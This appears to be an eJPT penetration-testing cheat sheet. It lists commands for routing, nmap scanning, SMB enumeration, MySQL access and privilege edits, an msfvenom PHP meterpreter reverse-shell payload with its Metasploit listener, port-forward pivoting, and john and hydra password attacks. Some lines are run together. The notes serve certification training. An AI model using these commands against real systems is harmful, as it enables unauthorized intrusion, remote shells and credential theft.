route
ip route
route add -net 192.168.10.0 netmask 255.255.255.0 gw 10.175.3.1
ip route add <subnet> via <gateway or router address>
for example,
ip route add 192.168.222.0/24 via 10.172.24.1 # Here 10.172.24.1 is the address of the gateway for subnet 192.168.222.0/24
Checking Routes & Adding Manual Routes
nslookup mysite.com
dig mysite.com
ip route # Checking defined routes in linux
route # Checking defined routes in linux
route print # Checking defined routes in windows
nmap -sV sC -T4 <ip> -oN out.nmapsudo nmap -sN 172.16.64.0/24
fping -a -g 172.16.64.0/24 2>/dev/null
fping -a -g 172.16.64.0/24 2>/dev/nullnmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
If an nmap TCP scan identified a well-known service, such as a web server, but cannot detect the version, then there may be a firewall in place.
For example:
PORT STATE SERVICE REASON VERSION
80/tcp open http? syn-ack ttl 64
Another example:
80/tcp open tcpwrapped
“tcpwrapped” means the TCP handshake was completed, but the remote host closed the connection without receiving any data.
These are both indicators that a firewall is blocking our scan with the target!
Tips: - Use “–reason” to see why a port is marked open or closed - If a “RST” packet is received, then something prevented the connection - probably a firewall!
nc -v www.abc.com 80 # After pressing enter you are prompted to send some dataType two lines given below and press enter two times to get http responseGET / HTTP/1.1Host: www.abc.com
openssl s_client -connect hack.me 443 # Establish ssl connection
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://172.16.64.140/project/backup -U admin -P admin
ipconfig /all # windows
ifconfig # *nix OSs
ip addr # linux
arp -a # Windows
arp # *nix OSs
ip neighbour # Linux
netstat -ano # Windows
netstat -tunp # linux
enum4linux -a <ip> # Enumerating using enum4linux tool
smbclient -L //IP -N # Checking for available sharessmbclient //<target IP>/IPC$ -N # Connecting to a share
nmap -p445 --script=smb-vuln-* <IP> -v # This will run all the smb-vuln scripts, if you want to run only few scripts then you can check other available scripts in /usr/share/nmap/scripts
Try to login without a username or password:
$ smbclient //ip/share -N
Login to MySQL with password
$ mysql --user=root --port=13306 -p -h 172.16.64.81
> SHOW databases;
> SHOW tables FROM databases;
> USE database;
> SELECT * FROM table;
Change table entry values
# Add the user tracking1 to the "adm" group
> update users set adm="yes" where username="tracking1";
msfvenom -p php/meterpreter_reverse_tcp lhost=10.13.37.11 lport=9001 -o msf.phpuse exploit/multi/handler
set lhost 10.13.37.11
set payload php/meterpreter_reverse_tcp
set lport 9001
runportfwd add -l 2222 -p 22 -r 172.16.50.222john -wordlist=<wordlist> <file to crack>hydra -l <username> -P <path to wordlist> <IP> sshhydra -L <path to username wordlist> -P <path to password wordlist> <IP> sshhttp.request.method == GET / POST
eJPT-Cheatsheet/eJPT Cheatsheet.md at main · atinfosec/eJPT-Cheatsheet
https://www.notion.so/CTF-2021-67649903f2f24e41b3625f69390b3be5